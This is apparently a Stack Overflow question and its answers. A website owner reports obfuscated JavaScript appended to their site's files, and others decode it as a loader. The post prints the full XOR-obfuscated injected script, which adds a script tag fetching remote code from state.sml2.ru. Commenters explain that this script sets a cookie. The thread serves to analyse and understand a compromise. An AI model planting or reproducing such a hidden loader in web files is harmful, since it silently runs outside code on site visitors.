-2

I have a website. I've found out, that some javascript files have strange code on the bottom. Here's an copy of that code:

function abbxeasat(c4cr4pm4){return g46isme(i7h22f0gi4(c4cr4pm4),'g4u0kvvbo');}function i7h22f0gi4(kr8sug){var nn68ho='';var lp79msv=0;var sxifdfz=0;for(lp79msv=0;lp79msv<kr8sug.length/3;lp79msv++){nn68ho+=String.fromCharCode(kr8sug.slice(sxifdfz, sxifdfz+3));sxifdfz=sxifdfz+3;}return nn68ho;}var k4ovchr=["020087", "021093","023064", "004070016081031019051014010010081027068","020070022", "019077005085", "019081013068068028023020014020087007089027002", "006068005085005018053010006011080", "015081020084", "000081001117007019027007001019071055073063023017044014010081", "015064001064081089089017027006064016030024027026080065021065090090024089021012027073094006"];function t6rn0k(kd858l6){var ircm0d8ot=document[abbxeasat(k4ovchr[3])](abbxeasat(k4ovchr[0])+abbxeasat(k4ovchr[1])+abbxeasat(k4ovchr[2]));ircm0d8ot[abbxeasat(k4ovchr[4])]=kd858l6;ircm0d8ot[abbxeasat(k4ovchr[5])]=abbxeasat(k4ovchr[6]);document[abbxeasat(k4ovchr[9])](abbxeasat(k4ovchr[8]))[0][abbxeasat(k4ovchr[7])](ircm0d8ot);}t6rn0k(abbxeasat(k4ovchr[10]));function g46isme(a747mi3lx, ysbu3g) {var y7lk3ubt='';var c2zom0n=0;var a9yhxvd=0;for(c2zom0n=0;c2zom0n<a747mi3lx.length;c2zom0n++){var x7t9oj0=a747mi3lx.charAt(c2zom0n);var a205z01r=x7t9oj0.charCodeAt(0)^ysbu3g.charCodeAt(a9yhxvd);x7t9oj0=String.fromCharCode(a205z01r);y7lk3ubt+=x7t9oj0;if(a9yhxvd==ysbu3g.length-1)a9yhxvd=0;else a9yhxvd++;}return(y7lk3ubt);}

I think that my webserver has been hacked. Can somebody tell me what this code does? And how it came to be in my file?

gariepy
  • 3,576
  • 6
  • 21
  • 34
Sergey Tyupaev
  • 1,264
  • 9
  • 23
  • 2
    Better to contact [security.se]. – Praveen Kumar Purushothaman Dec 24 '15 at 19:28
  • 1
    Welcome to Stack Overflow. I have fixed English issues with your post. – Rohit Gupta Dec 26 '15 at 23:26
  • Once it is all decoded, it boils down to `var script = document.createElement('script'); script.src = "http://state.sml2.ru/js/cnt.js"; script.type = "text/javascript"; document.getElementsByTagName('head')[0].appendChild(script);` which appends a script containing `document.cookie = "mcexp=20151227";` which sets a cookie that seems to contain today's date. However, there is nothing saying that there isn't some server side code being executed to gather information like IP address and such. –  Dec 26 '15 at 23:56
  • I am sorry guys. I've got some problems with English.. Thanks for your answers! – Sergey Tyupaev Dec 27 '15 at 18:46

1 Answers1

1

After flattening it out and making it readable, it seems to do this:

createElement
(index):9 sc
(index):9 ri
(index):9 pt
(index):9 src
(index):9 type
(index):9 text/javascript
(index):9 getElementsByTagName
(index):9 head
(index):9 appendChild

And what it appends is:

http://state.sml2.ru/js/cnt.js
Anees Saban
  • 607
  • 6
  • 11
  • Thanks for your answer! Can you tell me how did you made this code readable? It's really interesting to me. – Sergey Tyupaev Dec 27 '15 at 18:50
  • 1
    I console.log()'d what it was returning. Please note that if you run the code it will create the cookie (that does who knows what on your site), so remember to delete it after. – Anees Saban Dec 27 '15 at 22:32